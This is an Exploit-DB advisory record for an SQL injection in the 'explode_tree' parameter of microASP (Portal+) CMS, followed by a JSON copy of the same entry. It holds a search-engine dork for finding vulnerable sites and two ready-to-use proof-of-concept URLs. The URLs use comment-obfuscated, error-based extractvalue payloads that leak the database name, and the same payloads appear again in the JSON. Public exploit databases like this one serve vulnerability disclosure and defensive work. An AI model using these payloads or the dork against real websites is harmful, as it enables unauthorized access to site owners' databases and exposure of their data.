ID EDB-ID:46799
Type exploitdb
Reporter Exploit-DB
Modified 2019-05-06T00:00:00
Description
[+] Sql Injection on microASP (Portal+) CMS
[+] Date: 05/05/2019
[+] Risk: High
[+] CWE Number : CWE-89
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.microasp.it/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Gnu/Linux
[+] Dork: inurl:"/pagina.phtml?explode_tree" // use your brain ;)
[+] Exploit :
http://host/patch/pagina.phtml?explode_tree= [SQL Injection]
[+] PoC :
https://server/pagina.phtml?explode_tree=-1'/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/ database()),0x3a7333783075))--+-
https://server/pagina.phtml?explode_tree=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-
[+] EOF
{"id": "EDB-ID:46799", "type": "exploitdb", "bulletinFamily": "exploit", "title": "microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection", "description": "", "published": "2019-05-06T00:00:00", "modified": "2019-05-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/46799", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2019-05-06T12:19:40", "viewCount": 170, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2019-05-06T12:19:40", "rev": 2}, "dependencies": {"references": [], "modified": "2019-05-06T12:19:40", "rev": 2}, "vulnersScore": -0.1}, "sourceHref": "https://www.exploit-db.com/download/46799", "sourceData": "[+] Sql Injection on microASP (Portal+) CMS\r\n\r\n[+] Date: 05/05/2019\r\n\r\n[+] Risk: High\r\n\r\n[+] CWE Number : CWE-89\r\n\r\n[+] Author: Felipe Andrian Peixoto\r\n\r\n[+] Vendor Homepage: http://www.microasp.it/\r\n\r\n[+] Contact: felipe_andrian@hotmail.com\r\n\r\n[+] Tested on: Windows 7 and Gnu/Linux\r\n\r\n[+] Dork: inurl:\"/pagina.phtml?explode_tree\" // use your brain ;)\r\n\r\n[+] Exploit : \r\n\r\n http://host/patch/pagina.phtml?explode_tree= [SQL Injection]\r\n\r\n[+] PoC : \r\n \r\n https://server/pagina.phtml?explode_tree=-1'/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/ database()),0x3a7333783075))--+-\r\n https://server/pagina.phtml?explode_tree=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-\r\n \r\n[+] EOF", "osvdbidlist": []}
{}